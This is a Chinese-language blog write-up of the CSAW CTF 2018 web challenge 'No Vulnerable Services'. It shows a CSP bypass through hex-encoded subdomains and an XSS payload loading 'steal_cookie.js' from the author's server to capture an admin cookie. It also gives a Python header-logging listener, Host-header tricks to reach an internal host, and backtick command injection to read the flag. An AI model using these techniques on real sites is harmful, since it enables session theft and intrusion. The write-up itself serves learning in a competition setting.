Automne's Shadow.

CSAW CTF 2018 No Vulnerable Services WriteUp

csp xss
2018/09/24 Share

Web

题目:

automne

打开之后其实是一个HTML5网站。使用Burp抓包,可以看到使用了CSP策略。

automne

使用https://csp-evaluator.withgoogle.com/进行CSP检测,发现script-src存在安全问题。

automne

最终在网页底部发现d8a50228.ip.no.vulnerable.services,访问后发现内容和当前网站一致。

automne

可以发现d8a50228疑似Hex字符串,使用https://www.browserling.com/tools/hex-to-ip进行解析,发现是一个IP地址:216.165.2.40。

Ping一下题目网址,果然就是上面的IP地址。

automne

将自己的VPS地址转换为Hex格式,进一步访问2d3e6213. ip.no.vulnerable.services,果然是访问的我的VPS网站。

automne

由于CSP中存在script-src *.no.vulnerable.services,所以现在我们能绕过CSP保护了。而且服务器上的bot会check下面的提交内容。

automne

左边的邮件地址任意,右边内容填上如下脚本:

1
<script type="text/javascript" src="http://2d3e6213.ip.no.vulnerable.services/steal_cookie.js"></script>

因为直接使用apache2无法拦截到请求数据,所以这里在VPS上service apache2 stop关掉服务,并使用如下python服务端脚本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/env python
# -*- coding: utf-8 -*-

try:
    # Python 3
    from http.server import HTTPServer, SimpleHTTPRequestHandler, test as test_orig
    import sys
    def test (*args):
        test_orig(*args, port=int(sys.argv[1]) if len(sys.argv) > 1 else 8000)
except ImportError: # Python 2
    from BaseHTTPServer import HTTPServer, test
    from SimpleHTTPServer import SimpleHTTPRequestHandler


class MyHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        print(self.headers)
        SimpleHTTPRequestHandler.do_GET(self)

if __name__ == '__main__':
    test(MyHandler, HTTPServer)

上传到VPS网站目录下,监听80端口,接着将js提交check后,将会返回管理员的cookie和后台地址。

automne

使用上面的cookie登录后台,形如

automne

其中Support链接打不开,Load Balancers打开后形如:

automne

上面我们已经知道直接访问support.no.vulnerable.services是不通的,既然有负载均衡器了,那么216.165.2.41极大可能是一个代理服务器。访问216.165.2.41并抓包,将请求头里的host修改为support.no.vulnerable.services,可以看到有回显了。

automne

看来需要绕过,那么ping一下上面那个网址,下面是linux和windows在ping时的差异。

automne

于是知道了其内网IP地址172.16.2.5,将其转换为Hex字符串。

将ac100205.ip.no.vulnerable.services添加到Host里去。

进去之后长这样。

automne

接着还是要抓包改Host才能执行成功。

automne

这很明显是一个命令执行漏洞了。经测试发现使用反引号可执行。

automne

首先ls发现根目录下有flag.txt,接着cat出来,注意使用%20代替空格。

automne

最终得到本题flag: flag{7672f158167cab32aebc161abe0fbfcaee2868c1}

原文作者: Automne

原文链接: https://ce-automne.github.io/2018/09/24/CSAW-CTF-2018-No-Vulnerable-Services-WriteUp/

发表日期: September 24th 2018, 7:20:00 pm

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
Total : 62
2021
2020
2019
2018
2017
lfsr z3 python reverse fat git broadcastreceiver sha-1 cbc sqli sqlite golang race condition luks hashcat photorec MAC sso oauth 2.0 padding oracle csp xss abe vdex ransomware frida ndk pwntools hashpumpy sourceleakhacker ecb socat fastjson JdbcRowsetImpl idea servlet volatility inet_aton boneh durfee lcg rabin egcd cipolla's algorithm spi snakeyaml ScriptEngineManager malware codereflect mysql yara plugin deserialization log4j rsa binary javascript prototype pollution nodejs shiro ysoserial primefac rsatool ssl AES tshark gmpy2 RsaCtfTool Hex flask ssti ecc Modular operation WebGoat8 order by tomcat nim game .iso gpg outguess sage google cloud sdk zsteg base58 fermat multi-primes prng rmi jndi Paillier Cryptosystem rsa lsb oracle SQL Injection ping delay xor CAS 单点登录 渗透测试 weblogic xxe reflect 010 editor gcd
Crypto Android Web Forensics Misc